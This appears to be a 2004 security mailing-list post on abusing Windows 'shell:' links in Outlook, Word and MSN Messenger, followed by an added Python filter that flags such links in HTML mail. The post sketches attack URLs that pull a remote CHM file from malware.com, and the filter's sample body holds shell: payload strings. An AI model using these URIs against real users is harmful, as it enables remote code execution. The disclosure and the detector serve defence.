Message-ID: <200407111617.i6BGHTjK013733@web185.megawebservers.com>
From: 1 at malware.com (http-equiv@...ite.com)
Subject: MSN Messenger is vulnerable to the shell: hole
<!--
Ctrl+clicking a shell:windows\\notepad.exe link in Microsoft
Word 10.2627.3311 launches Notepad.
-->
this can be very interesting. The same in Outlook 2003 both html
and rich text. Good thing the named temp file deposits were
magically patched.
As Andreas Sandblad mentioned the other day the assigned
application will open depending on the file extension.
In Outlook 2003
shell:foo.hta will open an empty Html Application window
shell: foo.chm will run hh.exe with an error
shell: foo.js will run Windows Scripting Host with an error
showing the full path where it is looking to run foo.js
shell: foo.eml completely screws up Outlook Express with a
series of errors
the idea then would be to run directly through the non-existent
file it is trying to open e.g:
shell:foo.chm::http://www.malware.com//bad.chm::/foo.html
or
shell:C:foo.mht!http://www.malware.com//bad.chm::/foo.html
either that, or get something into shell:foo.hta or try to
resurrect the named file in the temp. Lot of possibilities
including embedding the file directly into the mail message
and linking to it.
All needs to be thoroughly examined though. Which would be
unfortunate for the peculiar completely clueless few who think
that you just "flick" a switch and the fireworks begin.
--
http://www.malware.com
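
For filtering HTML mail before it reaches a client, a check for the `shell:` links described in this message, reporting the file extension that decides which application would be launched. This is an added example, not part of the original post; the attribute list, function names and sample HTML body are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Attributes that can carry a URL in HTML mail (assumed list, not exhaustive).
URL_ATTRS = {"href", "src", "background", "action"}
# Some URL parsers ignore tab/CR/LF in a URL, so remove them before matching.
STRIP_RE = re.compile(r"[\t\r\n]")
# First file extension in the target: per the post, it selects the handler.
EXT_RE = re.compile(r"\.([A-Za-z0-9]{1,8})(?=$|[:!?#/\\])")

def shell_target(url):
    """Return the text after 'shell:' if url uses that scheme, else None."""
    cleaned = STRIP_RE.sub("", url).strip()
    if cleaned[:6].lower() != "shell:":
        return None
    return cleaned[6:].strip()

class ShellLinkFinder(HTMLParser):
    """Collects (tag, attribute, target, extension) for every shell: URL."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser has already decoded character references in values.
        for name, value in attrs:
            target = shell_target(value) if name in URL_ATTRS and value else None
            if target is not None:
                ext = EXT_RE.search(target)
                self.hits.append((tag, name, target, ext.group(1).lower() if ext else None))

def find_shell_links(html_body):
    finder = ShellLinkFinder()
    finder.feed(html_body)
    finder.close()
    return finder.hits

# Constructed sample body; the shell: targets are the ones quoted in the post.
SAMPLE = (
    '<html><body><a href="shell:foo.hta">report</a>'
    '<a href="https://example.invalid/page.html">ok</a>'
    '<img src=" SHELL: foo.js">'
    r'<a href="shell:windows\\notepad.exe">notes</a></body></html>'
)

if __name__ == "__main__":
    for hit in find_shell_links(SAMPLE):
        print(hit)
```

A gateway would typically strip or rewrite any attribute this reports rather than deliver the message unchanged.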